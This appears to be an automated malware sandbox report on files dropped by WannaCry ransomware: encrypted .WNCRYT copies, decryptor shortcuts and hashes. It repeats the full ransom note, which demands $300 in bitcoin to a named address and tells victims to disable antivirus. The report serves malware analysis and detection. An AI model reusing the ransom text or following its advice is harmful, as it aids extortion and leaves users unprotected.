Preview:	WANACRY!........5..V......d..c.. .#...F?l.#........2tpJl.&.F.:...i.u.{.V.\....+.<.........._.]..=.y.)t_.s..t.}.]..8...'...gC.$..6t...._M..O0.....z.J.F.9}.....\|.y....u.....n.........'f..k?...Z.#..ye.p.y...D..G....{!...ik..Nxv.~.(.\|..g.7o......q`......N..............aa..g..](.0........R.jz.B.I.y...-cC.p.$.?...E..+._<.a..Z{1.MF.!.ss..P"/.Wp5..=.N.,P....Y.1.f7..oH.?.5.1....xl.9....U.J.+.TK q..c...BK....,Ue..qD..78o3,.).V......F/..i(..t....%)UV!..26.r..f....I..........>.f.r.?J5U.g.....3....+lP....>/...t..:.@........r...CX..<(D..M{....3....@...Q/.p..2^_}....7....Ss.(..#.8....,M.L[..........7+..3=..v2..T....T,.........K\|.Y.]...R.>.r.f.H.J....8o....+F..Ht.T<...`.]w...<)q..#...o.W.l.m.... $?=5z.....d.`..P..................(...R.5.B.EoN........^?7...1....Fy.o..C..X..M.P.r"......mR....x...f...'...v.....)v.n(_.*.<...p..".U..q...P%g.W.Gnl.v8..$...F..N...f.~...h.......H...m&.O..Aj..=jJ..]".H.d]......xr.....K0.P....r.Y.Lo......+..pW9.m.0,,.u.g.?Y,

C:\ProgramData\Microsoft\UEV\Scripts\@Please_Read_Me@.txt

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.711824502619554
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
MD5:	7A2726BB6E6A79FB1D092B7F2B688AF0
SHA1:	B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
SHA-256:	840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
SHA-512:	4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
Malicious:	false
Reputation:	unknown
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

C:\ProgramData\Microsoft\UEV\Scripts\@WanaDecryptor@.exe.lnk

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 16 12:48:43 2023, mtime=Wed Aug 16 12:48:43 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
Category:	dropped
Size (bytes):	577
Entropy (8bit):	5.130736260231282
Encrypted:	false
SSDEEP:	12:8RWXpzYNbfubUV9nCOTUoBjA9RoTwmQbmCt:8R/4bEcOA9CDQbm
MD5:	EFF1EF4995F8BF6C61B07BA09D6F5B70
SHA1:	3962AE93845DEFBC439B6C727218F3587C07AD5B
SHA-256:	FE6E4230472001768D368ECE27D067A6C7A060DCD37C29F6E763556A83523A02
SHA-512:	900144EE048935C7F38CE7A503C6CB8E4246C97A3F8D254D22725AB03D6CA151D9416AB70D4B094BFA86AEF5C9DFD051EAF559E65FBF4E383FB48088889560E8
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ....&.^H....&.^H....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....'_H....'_H.....t.2......J.. .@WANAD~1.EXE..X.......W.n.W.n....up........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y............Y~.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......675052..............n4UB.. .\|..oI..k;<.....P..#.....n4UB.. .\|..oI..k;<.....P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	904
Entropy (8bit):	7.7469364607064435
Encrypted:	false
SSDEEP:	24:bk52MrM7uVTxjTlsXFNLpwS7xGhcL4knFpx2o:bkNwa5xjRsXTLm8Ghopxl
MD5:	BDDFA3D3FBAA274F6CC4AB99FCB579BC
SHA1:	67653859862ADDD3BA077DD08B0CF117B20A0324
SHA-256:	A92D61CF03BDF74788061573A7F0BABA3A046D2CE3F91C1F8873ECC9532F6DEF
SHA-512:	FDAF8C251EF8530F5E47FA449FD9ED8A241ED2108F8CA3369361384F62B067AA3BF68DA9139182A48C236B509FFB3582E06DF8F20C6B4088A65ED048B0CD5CB1
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......]. M G.`".=.}.0....r.d..R.'oiP.-..I:.... (...nWW..!@.L.\|.:..&OB. R/lg.....\:...k.Hj.T....(..#..............,t...6K...'..8...0.P.\|7..j......d7mA....w2....~..>E.f.....v..1.z8/..D...^Z]Qi.W..EfTf......A"P...;R...g~.?...L....-....t..q./OM...,........c......./.....q.........Y./.[x..g..7.\|.......a?.-.k.6...... ..k........<.k....%O...I..o.t4....iV....{..l...'aW......x....j..a\|j.}Q..S?y..E3.......[J#...bh.q.......EZ.....)q.bl....i'...........n..R.V.B...k.V..R....ug.....@.\|.{....A.V~#_..O..s.:?i$....p..-.o......&... c.....j..q..gzHP.;..!.Iy.D.....\|.LD..n.....U...:.T.7W.jut=........L..Q....%.p$(.>.X.......r....#..e5>..n.....q.a$x.P2.S..2..^.L.;.f..<..g.h.t..[z.....>..G..V.-;%...P...._..G(.{.?l;io.S....:.L-.T.K/.a......F...........h..f...a.$...}.O..!..1.6.c..o>{M..~.g......g:...x1...8.g....KI..3.~V.D.t.......6/ND.{.P.......n.c.....r.

C:\ProgramData\Microsoft\User Account Pictures\@Please_Read_Me@.txt

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.711824502619554
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
MD5:	7A2726BB6E6A79FB1D092B7F2B688AF0
SHA1:	B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
SHA-256:	840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
SHA-512:	4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
Malicious:	false
Reputation:	unknown
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

C:\ProgramData\Microsoft\User Account Pictures\@WanaDecryptor@.exe.lnk

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 16 12:48:43 2023, mtime=Wed Aug 16 12:48:43 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
Category:	dropped
Size (bytes):	577
Entropy (8bit):	5.130736260231282
Encrypted:	false
SSDEEP:	12:8RWXpzYNbfubUV9nCOTUoBjA9RoTwmQbmCt:8R/4bEcOA9CDQbm
MD5:	EFF1EF4995F8BF6C61B07BA09D6F5B70
SHA1:	3962AE93845DEFBC439B6C727218F3587C07AD5B
SHA-256:	FE6E4230472001768D368ECE27D067A6C7A060DCD37C29F6E763556A83523A02
SHA-512:	900144EE048935C7F38CE7A503C6CB8E4246C97A3F8D254D22725AB03D6CA151D9416AB70D4B094BFA86AEF5C9DFD051EAF559E65FBF4E383FB48088889560E8
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ....&.^H....&.^H....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....'_H....'_H.....t.2......J.. .@WANAD~1.EXE..X.......W.n.W.n....up........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y............Y~.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......675052..............n4UB.. .\|..oI..k;<.....P..#.....n4UB.. .\|..oI..k;<.....P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

C:\ProgramData\Microsoft\User Account Pictures\guest.bmp.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	602456
Entropy (8bit):	7.9996950437902585
Encrypted:	true
SSDEEP:	12288:n01aB8y/sW2vSnadp2mjofssFxVw5rzPDFhDgrTn:01a3/sLvSnC2Lsoq5vPDFpgP
MD5:	E0491F46BDBE88D2231E00C862CBAFFF
SHA1:	5B43E4D697AAC0107779768A9B858D576E1AEA60
SHA-256:	9C411A99A8C9DE39C97474FE9574C41E940144F8D1C1A92C1819179839A7387F
SHA-512:	F8C4F8BF9250C23F3A7E55B2A8024D073532FC77871A50059FC18BF641B15822EAF8E7369D8D84B2C6E79EA3022B1DCECA207AE59C3E9BF265E9E5BA1E1DEFEB
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....C.o....=......k.L\..4X..O...COBZ7[....c....7..^;9d4.aV<..C...i.q....-..Rp...3.........]./..9....a.......&I..y.^..]~...\|4...H....;..p...(.K1...b...N..X'/..6>J6.5~C.h...6...&..X..SYP-. .n.C.U.....t.?...))(.!HR.zRx.N.....Yv.AZ`).7.J~;......zr..?S.......80.........Z'..%.V..j..+......g..`.Q......H.GZ..~.-..!v.L..F..`......h..4..T...{>.ZY@q] ..`.,LZo.=O.S_!.i.?...~~.r.%P.{W.L...3.....EH.+W!.)A.....T...`......4......m...8.. \|.p......v...a.%E.@n.......$......&..M.....D .'...%&N...}f.y.v..<!e.Szh5.}..U..]....X.e.......s2\.d.>N.@"..P.(.e.[U..h..X....R9....1.......K.}..Lv,6\.2...v=owf_..N......}....J.. .....s.....e........D.....e.,..t.\Y........YLe..sr.. .\.YP..;.+.}>w^.$&*.t....)....Pk=.F..\|......D7...B... .h...n.G.^D......C.....W..\|K.o....K.....4c.[..t>....Z..Y...!\1..1.}.!.S......v.s.x.W..p..2.9EW..a%TGCj.].E>.'gZ.^...K...J.R...z.(.."..W%.~.e.... ...=.....X.Q..d..2.........^C;.9..q..N.r..b........QJO.,..m5T..F..r[...>_...3.J_ ;.Fgc.Ek.....

C:\ProgramData\Microsoft\User Account Pictures\guest.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	6344
Entropy (8bit):	7.971077719584379
Encrypted:	false
SSDEEP:	96:oC2lwpFVk5c8cLqjMUjXSiF++Fhj8z+W2sGwpdEJDF3UL9m1WVM6XFVisEAG8DXr:HFprWIUsQj7sGwcahmUZ1EqeORcwuk
MD5:	623591E56A8A1087AAAE563C7900049A
SHA1:	88E943B7289AED7DF5AF03D1B30ED03A6C725F8F
SHA-256:	A9B869A0E8338676B6C337CD19409DFBCFD0E5BBDE5D762D4EF278459296EC1D
SHA-512:	0FCA6CD0B600C85760509890A875B48E1E4803B109AF0357874A27C5F6431B4861A3D52A14796D86056785000FC59551C5C0EE894934CFD1008872B2E553E02B
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!..........N..#E..C.'.5.UK.{$LX.G.[...(BA.......W...9.6...8a...e,k.r.Q....9V...+...?X..>.[..~..=>V.@.s.g'....T@.f..p^.~q..d.......-X.S..S..".c..9.Vc..i^..e.?.X-wT.s.;.8..&&d;.[G.....3n.t[.....,R<..W......C... ..=(..iZ].k.P..z..2Ae.....e6/d....E.GH.............&..3z..t.O..<.&:.jK=L.@.........i.X.\|....G.,.\|T....Os.....E._..G.L..c.q...b.m....`mcXa\x.._.['..?z.@.q[yt..nB.E`$...........mME^..2...5..{.o....y.D2...C.[.&.....!..;...qd.2.........=.1H..G...t.v.h.X.Bd.s...iZ..;.U.Z3..G3.......}...~:..........!....^.hM..\|...1..?......:..~.....;6. ......P.^.8v.i.../U."X..Kd{...~..1..W...UV.8V...y.o..bly.+(..L.n.T..1.2e...lKN.......!...:.+..^...!..^Q...N}kz.Y:.T.....1....b...y.4.+.r.8.....-.fS...Fa.L7r.S..(w..R.a.>.}..~...g.....t.......k....W..*.....HJ...j}..Y[.#7......f....^....,Nq._...0.C.......y=..-...j.vR.....2.O...v...8.@.3....D..\|'..e..KeQ..}8.g.b.+.>.......&.Q.S".......!.\.+]....T.M......w....>..M..d..+.q..m...[E...<..M..._P.N...e{..r

C:\ProgramData\Microsoft\User Account Pictures\user-192.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	2680
Entropy (8bit):	7.924510165650498
Encrypted:	false
SSDEEP:	48:bkDjolXVtKc1Mx7Yb1um4A72Ptm+jZ557u4q0F2XDlKD2ghGR2YyzJuD+:onl9xkbWA72Px137u4qs2Tl6jHluD+
MD5:	643250FE6E2208979112D15D77C0D52B
SHA1:	87A67424A81BD3A5FF0CE0A5001C95E7EEDC1188
SHA-256:	3F8AF028D00DC6109F60F6C7CFBD62F30D3E9C2A04CACFF7D663F492F738A69B
SHA-512:	A008410E102E0AF36969ED4A1C67630EB7A14BC7046B10E1DF09FAB10C7D75E142C3222F738C9F8727D3CC6C0F64503818F4F5A4AD96715C2BAF4999D017D6B5
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....C`w....6\L.2l./.X....U)kfZ#.M.`.\|..t..=Q..c~....Q...I..\.2E.u.......Wz[...IS....Q'..Ua..G..?.._..<.3Yu...2<.N...<...._..i..JWA....6....T5...c.c..V.I..<x....>.d30N>.......o5.W=.0....=^...q..\..?..i_...!o2..6).Y}.\......d....r....&...o.x..D+.F....X........_.Tm.3..n.v.DI+{..Q..U...Es.W%.q-....%.1.......;..........b.C(.+....4w....'..`...E.f.....H.$}Y.....\|..9....&2at..(i.e.%..1v.S....L..7..5.?<i......;....!.3.$kg..B.do.=..Td..bA.?.......U7./).$....+...Z.z.$=......(..(0%.>...c....W..=.1=q..H..#.E. ..v.K.[Z.4...-.\.i.p.9>..9..z....Y.{...~.2...J....&6.....Vq..!...{..I.y.)...z....j.E....c.J...)^.}3...{...6.(5..d..q.i.ry...(o..7..$@..Q_5=.H..@.3.01..&...:...v(.N.[B..i.q..1..v...UX8......5.W....UqT...I.].i..f......uo.<<].%.d~.b.&c.^.=..igQV./V>......{N.~...?C..v..h..q..8..P,n...[.w.z.K..R.G-./.....[1.....q....C.3....c....A...LV1)...W]....W....W.r}F+...f.v.......*V..\|T...6.....St..M...&.<....~.m...oN..,'....W...=....x....../

C:\ProgramData\Microsoft\User Account Pictures\user-32.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	728
Entropy (8bit):	7.666117923576952
Encrypted:	false
SSDEEP:	12:bkEVOiVJrDH+yGinEmHuc8WGTKmQG6oITXC64wOFnhppRw3vuEdbbHLaS0p2mR0W:bk4RJrd/5G6Vjz49hRw3vuQb0pdRcAHX
MD5:	0A50C35D967EB405B6F43B6F59480A91
SHA1:	6EE4286888DD6DB78A66008ACDD7AACEE9FF973D
SHA-256:	9C8D55772668B34660D305C79C1DF79136A53F382711EF659D568934E9705769
SHA-512:	E193468C879AE261BFBD8F12532DDADBCF1B492414B12B063E8CE459F8A2AA806AFED3D4D07247FA7CCD671DDA54825018A90691D1DC93EC0E07896F6C0DE0FF
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....cD..e.r.}m....3@F\|..:.)J.O.......J.X..2PT.....]'..#x..Z."/... J.......T-...T....A.q.x>&awsZu&E.....U..J...Y....)..j.o.........]...d....4....,2.u..X.O..N..dS...O.K.j... q...os.W..l......e.......^[s _.RZ.m_U5.#=.. Qw.3.bX..a.....Q...a..QK../$>............)$..T.....y.!...r..U.4Q~...../..0g...."@BuG.7....}o.W3.mbI\|.w...=\T~i...i$.#{....-..Lx......h....e .[.R:.....P.>..{q...F........g<..z74V...!Q.o-^....H"..\.l.....K:.E3)..$fY..e..n.N.g..X....v.,..d...vxp.$...Zl..?..cIu....pc...&;OW....Z...F.=...y&...)).gR.!..Z......'..........v,..5.F.....w)..".a...8..s..."..v..+Qi?.cI.'@.../..,..Mn.7....q.`.?...#y..H.q.Em.Q.&...~.A....K.N.....?.....p..Q_.B=s..'..R..K.idBC.Z.T.....%.........p

C:\ProgramData\Microsoft\User Account Pictures\user-40.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	808
Entropy (8bit):	7.731823555024473
Encrypted:	false
SSDEEP:	24:bk3MDFpTaB7bdqgeIAEnLf/lRYEOmirsJT+6Bt7:bk8hYJ5eDEnLf/lemws1+6Bt7
MD5:	FC99E086ECA3863F76FBD2B7E994FAFD
SHA1:	377E26B1A05E9C4D597A9F2BF31900209B4E0C0B
SHA-256:	7DBA8F9DBE522A0A4E91BBAB3F49EDABD2EE5370938877181389F2352EE3F1B4
SHA-512:	C0BBD7D7CF245218E3BA31F0E4821248904DE0C0FA398516D7196C787D9631D5291D8685121D6639CEA20CDCBC93B21C23ECC61437BE752A251D2296B69B6DA1
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......5.E...qK....[j..vAOA......R....P...../.p...q...Y....=..Ak4oS..fv{...>e:[b...oG/.f.n..;.+..9.....\|.v.......2>...G..(K"O(..Y.0.w.m)G.$...2x.....c:.....8L.`$.>.f..........q.7..[...QGY..R.j.d .y.. .6.s.4...q.....+.t.X.]:e...4../.n. ...~M................B....o...E........l).d...2.b...ur...(...~.w. .@>...2.G.V.X.....`..qE......)}.}...T...O. . ~.S.....c.].+./d........Qi.........QG...l.S\|Y....v..d.G.W....C..S.k3....~.j...b$.:.....q9[\|!....[]A.6...R\..8.VX?A1..r..y.j...o.n......t.Xp.M.T....h.......*..%..5..(..B....}.Y?..`K...+..K3..zk.~..."..b.....e.C.....Q"..c.l..=x.,.....s.....o.#R.VBcp:a..1iJEe.;. .....Q.Z...9._l.L.)...\.H..k.:.P8......4%.8..R[.p..h.9......hP_....._.......u.Y..D&..e;.......@Q.YZ`...Z.zb.Q..-..e..9B_b..`.CFP.\|..x.....a.].c.1.......v.

C:\ProgramData\Microsoft\User Account Pictures\user-48.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	904
Entropy (8bit):	7.735760244980295
Encrypted:	false
SSDEEP:	24:bk8g6oR4MKOD2bbiI+wzdc6jqrDN/q3AotyTE7rKdivIe9K:bkcoe+qbbh+cWRrDNcE+PK
MD5:	475E6AFECD065CB613BADD1F943ADCEC
SHA1:	9D06309C1A6B34B441592964F7F1C7D2ADEE91A3
SHA-256:	BCF8337642D8060A19BC4CDFF700845C31467F5B01D60C257BBBDA98A74B61BD
SHA-512:	6F34D0FFF295624334676765FCDD751D8A2461DDB1FFFC82F281D86D0AB0679635B6C4B8F31825A9C1B449CA24EFB65EB8798600AF7C2D4DDB6DC4F7593D5897
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......h_..PDG.. ...Hz3DA\|...c.0L.$.....\|.lr..W.N...RwB.^...ll.>../......[:.S.....-&}....$.KD....j....B..F.~..%w...2=...l?7..o.0)......>..Fi.........V.2...U..QZ...`...y]..0.Z=........PW..0.a?.W....N........(....3.....v......!.C.D.C.G&..........`.].v....i...........4-j9...#...D....dn<].C.6.b.......>.y&y.hA..E...h4............d....4..O.b.k..\|o...)z.......J..E.u....x....>..f.h.`....[yx..w.....a.+.PO......._.b.#.}l[O&.........?3D-.^.6_..s.]...Tv......L.0..8..i...Rc....r..@..._....u..[c....w.dXW.....,[._p.....].,..89x....n<..Iw./...,Aj..`h,.8...\.C..8.*..x.+&...~...Q"Nf..E.;.Qi....:.2V.p.q.0......!1.z\.e...1.u."...o...&...E....{.).e:....y.....,3...X..V.&E.....?{...@.@..tT.S.4..U.^.0].j..Jb...[....K {@..b.....]....+.....3`......]....c...dB'eO..5G..vm&U>....$pb..m...X..c.W6.....}0.j..O.a].a...h......&......pv.$Kr'.p@.].,..(...i...i....A.q..L../%....{l

C:\ProgramData\Microsoft\User Account Pictures\user.bmp.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	602456
Entropy (8bit):	7.999677990661136
Encrypted:	true
SSDEEP:	12288:zq23lJc5qt1T3aMIacRdKtwAuF+n+NkbMgq6Lx06f1dHIoN48JZQ45uE:zqEl+AtZaMIZdKtwAuF+nZq6LxNdooNz
MD5:	0C6970D59A95F4391501B0C464BFD3A7
SHA1:	E4BAB8A20EBF29998493F605BAECA77B9826D467
SHA-256:	26A73C4587CA448A5A4B235DB176493E2A8618306B9DF59499D0BE158C91D177
SHA-512:	3F5AD3EC0904C8727C068378053965403F56A08562AFAFAFCE7C7C0C684CF2E8631DFA753F9DD6C521BEEC82F185CA22EE5A1A378F39080675BE9FC2AA486A8D
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....a...$I9......A...~..9./..)....l.U.3O~+....X.....G....{Zw@v}..)....I....\|Y...N[..}W.=^..vP.e...,.R #.................D.[...^...(..[..[........x...~eC...-=...};o.G.....(......0k{N...M...O..a{I.........\...P0.....m...r.u~R.q\|."}...J.5l$..g..r....80...........B.......\.....].=......Uk..L..S..sp....!9.`.xT..sL<.'JV......Xo...L..I...>+...+...)..).7.=..............<., 8=...c.G....&.#....<.;..M^J.4.U,:T...lpS2..p..p/.=.Q.....p.......}.(..Gq.E....R...s/.`.......c...!.pb.c.8pV~....@Ckm)...iz.O.s......0z.t~qf.....A..,.M3J.l.....k.e?a....m\l.cV..Hk!..........[..?..vw.6iU].5.?......w..>u..C.F}).@.t(...........H....x0.~g....T.O$WUx........{..GO..r.AH.J..h..........^..Q..K.p.....p..'.....HH.<.6w..8CPP...~.....I,S.a.........3..T..$.B...u6.....~1@.{.GXt6.&..{..%.OUnR..dj?.6".....<...lj.<..$4......DO2=......z.6.Q..e...Y.. ?.S.O.*..F... ....:]P.c..v.^.....j....2..A,T.9l..&%......wW%...:...nB..{...8$v.N..........~...8....0..w,n...E&...`BEC..

C:\ProgramData\Microsoft\User Account Pictures\user.png.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	6344
Entropy (8bit):	7.974174505007322
Encrypted:	false
SSDEEP:	192:/GJoYpRcPUSrqChsS1ig2iczr1jP9QbXl:/GuYp6Pnrqk11czJjPebV
MD5:	E0537B4A60254B4DC57806F777444B0B
SHA1:	8A024C6B940C8B4D3F3D9EF38B037C4864CB50D6
SHA-256:	FFA180A2A5FEBE02BAB2E5028C05DD2BC7D3DA2F959682BD1B5894BFBFE7D737
SHA-512:	F37D582C12564BFF30EE58FDB6520482032B8E434EE2AAFE81129DAC30711EEE4A1E07D6B3B1578BB20A6838F66A9633EEFF7EEFB59696E799AC3BA8447C7F73
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....z.~a.g@.p.OO.>.E8....!..D...79...cm..Q..m.`....^v.....z...^.O.r..i4S.r.G.X..p.R._O..>~S...0..Q.[.$(A......L0.\|.._n..$.Qc.}.]ox2.....C.Vq...F.\'BWI:c...-z..X..:1.\..b..[. ......'.Blt....q.....;a.XX.{j%...L.E:......j(.a....Cm...K;...&.t..6W....P...................T.T....f...0[}..R..&.......c..;..n....N?Mb........C.....9.W....#.................pB..J....!..).....v..w...s.V.T....c.D..<3.....I....cC.>\|.4...l...u.W.j.T.NX..V.......\|.'.? n.j.-..S.%.N......z ./^(...m.../".P.F.J?..'....p..Mw...j.N5.Q.pp0 ._%uZ.\.....6.W..:{..\|n.......}.!..G.Y..ku.6..7`........4D..;..(.y...y....}.P!.8#..2........kS...^......5>l...4...Q{a....r.".._..AsC.%l......tu..).d.;..jz.2.OF.^."\....\.....3e.......!+T....\..........).a".9.W...R.-).)...F9...=.w.^....;........m..2.bD....=..O....>.j.&..]...!..Df.I.... !V}.....)~.......\|5....vO..l.4....F!}.....~...G.....N.Y."L......+...y.....dW%......./0f...[.......Q...G..."........s..U..:..."x......c..j$.

C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2107.4-0\ThirdPartyNotices.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	7000
Entropy (8bit):	7.9739630122358856
Encrypted:	false
SSDEEP:	192:Si5ATyH2XHtLV0CDZ0jrf8/53z5QI247AI:S3TxHtVqrfO5FT
MD5:	6700558FD5CAE6834A4FC7E79B1C7FC3
SHA1:	11389ADF24C38AEC5D978D13176AB537E0C27C8D
SHA-256:	65AA7390AFC72A47DD9B0045A3E260083C43571ECCF91AAFB0F7967485C12BD9
SHA-512:	3B804B053778630906D8329BE416033D5233FF379B41063BEDFE09051600738312B86A0AA17F146F6AFA0EEF8FEDAA1A5A19635FB24216E2BD002910F6171717
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......Ycy/,.9.i.. .'..[Yj....'...TG.k2.;IW...........D..f.g..f....Z...r......[5........F)..!.}~../Y....!%...{.lG....}.j........(...<...,...`w..d.....%......2.h.k&.;...pCS.3q.o.\!.9..E.39;Xyx8OV.r.].4..J.N}.H.O...}.q.m....5..(.~T.p...c.r;\|..m..PN....=...........G.gh.u..r`..v..I0,..)....mU.%6...^.W.S.X..d....~H.~L.x@.J.J{.-rW332#.2..ywgN`.......=......`....4.....a.=........M...2..?..6F..<..c..~..OT..F.x..P#...l..=._{...}&.8T..MG...{.7.x5.u...p+5..MxkD....yi....<....I.\8.g.U....\.\+.'G...}...#.wz8.S...y..Cr.i1..]a....a&...<..:.....$8v.qGu..]kB....8......R.M..]\."".a,..j.%.....%D...Ib.6.4.F..E..t=..3LcYj.I!.m...b...".Z....Cf3.L=.@..u..&.....g&.r......J).t....#{..~..,....l}4"..%.SX?...w..3.fai./9.7F..[W...}6.+...Y.8:.]_...._...%...\|.9.6...g.2..;b;*e..t..3N.{.......N[H....^P]j.84..X...-f.9.......w>..pD6.BKo,.\.p.b$~.7.....$...\.9.OfR.O.>.q.....+........O..2...R..s..-]-..iM.E....G.wbx.{H.DO.^..)..B'..k..<....;..=.&.L6.U. ...._>......+.. `N{o

C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2108.7-0\ThirdPartyNotices.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	7000
Entropy (8bit):	7.976332457342148
Encrypted:	false
SSDEEP:	192:YGEZuzLyPgtjH+PdoWcySk7pjeSNbdQUNaN18KBnTr:XW4eF/cySkN5b2J8KBTr
MD5:	4D76F01E15FAEE541FC7D32B99540D75
SHA1:	5BEFDE4023857B0CA35F0C64EEBFF72FD5690A59
SHA-256:	D44F4BBC4BEDF5D54BB5BA2C278E92C664FAD3863BC26220204E9B5326B74352
SHA-512:	518AEBF29E3D865ECB1D0CD13C6DA12DA2726C2C42470E750E6327EB46E1AC32EF842828F5836C8C94A2DCC1DA924927F1B30C8ECE877916590FF2F5063FF31C
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....Y.\.%....m.2.s&.(.CSq...>...K.$..Q._8.t._X.v...@>:.#...m1....f.We...o..e....~..\|......).y{s..... .5L.....a..~k..S.C..o=./.......?q%_..qK/.cx.;f.v...\...eS..o.[..3..s!.K,..V.....4.@C....yD..h8i.&....c.!....J.:...[e..X...ws.@.x.}.O..IO1t..K'5.}.5(....=.......p..)~t.V.>Q&..6..w8....4..?.H.....".!/..{."&.J.v...).W.c.\|K}s...%.f7P".cH&A.i.GR......}.\|.h..5.,..(;........^0.<..S.0..1.'a`.\|..RS<T.Q..bn6w.^./\).l.35.iQ$.....,..j.....K.ZB.^...k.!N......(......L....U.&Y...R6..._U....<.T..(.......2..+..Q..e.F..`V.}Ar....y....-;._'.....W.H.k.(.^j.A..,.}..........=...@,W.[.:.....O?......t..5..^.f...2.OT.sU."....!....K.).i%s..\|..@...^\Z\:).[.x.....w.N..o.a<.W#g>U-..+._..N..<u!..HT\|.....Z..}1..>.uz..b~....9.....'W.tQ.u..2..#..A..!6...W.SY+.h6[....Z..]......m\..=...Ds.U....bh."......i.........Xu6.........1......j..o..@.\...$.m.S.>MO...o.....8..P,+C..o!.I...}M........C.e[A........%...-........zq:.Ac8..r................z....b.HdB....a.[...1.;{.p